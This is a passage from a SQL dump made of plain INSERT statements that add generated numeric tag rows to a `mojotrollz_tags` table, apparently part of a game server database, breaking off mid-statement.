INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173031, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173032, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173033, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173034, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173035, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173036, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173037, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173038, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173039, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173040, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173041, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173042, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173043, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173044, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173045, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173046, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173047, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173048, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173049, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173050, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173051, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173052, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173053, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173054, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173055, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173056, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173057, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173058, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173059, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173060, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173061, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173062, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173063, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173064, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173065, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173066, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173067, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173068, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173069, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173070, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173071, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173072, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173073, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173074, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173075, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173076, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173077, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173078, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173079, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173080, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173081, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173082, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173083, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173084, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173085, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173086, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173087, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173088, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173089, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173090, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173091, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173092, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173093, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173094, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173095, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173096, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173097, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173098, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173099, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173100, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173101, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173102, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173103, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173104, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173105, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173106, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173107, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173108, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173109, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173110, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173111, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173112, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173113, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173114, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173115, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173116, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173117, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173118, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173119, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173120, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173121, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173122, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173123, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173125, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173127, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173128, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173129, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173130, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173131, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173132, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173133, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173134, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173135, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173136, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173137, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173138, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173139, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173140, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173141, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173142, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173143, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173144, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173145, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173146, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173147, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173148, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173149, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173150, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173151, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173152, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173153, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173154, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173155, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173156, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173157, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173158, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173159, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173160, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173161, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173162, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173163, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173164, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173165, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173166, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173167, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173168, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173169, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173170, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173171, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173172, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173173, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173174, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173175, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173176, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173177, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173178, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173179, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173180, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173181, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173182, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173183, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173184, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173185, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173186, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173187, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173188, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173189, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173190, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173191, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173192, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173193, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173194, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173195, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173196, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173197, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173198, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173199, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173200, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173202, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173203, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173204, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173205, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173206, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173207, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173208, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173209, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173210, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173211, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173212, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173213, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173214, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173215, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173216, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173217, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173218, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173219, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173220, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173221, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173222, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173223, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173224, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173225, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173226, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173232, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173234, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173265, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173266, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173284, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173324, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173325, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173326, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173327, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (174045, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (174407, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (174408, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (174409, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (174410, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (174411, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (174412, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (174413, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (174414, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (174415, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (174416, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (174417, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (174418, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (174419, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (174420, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (174421, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (174422, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (174423, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (174424, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (174425, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (174426, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (174427, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (174428, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (174429, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (174430, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (174431, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (174432, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (174433, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (174434, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (174435, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (174436, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (174437, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (174438, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (174439, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (174440, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (174441, 2, 1, 230, 'generated'); INSERT 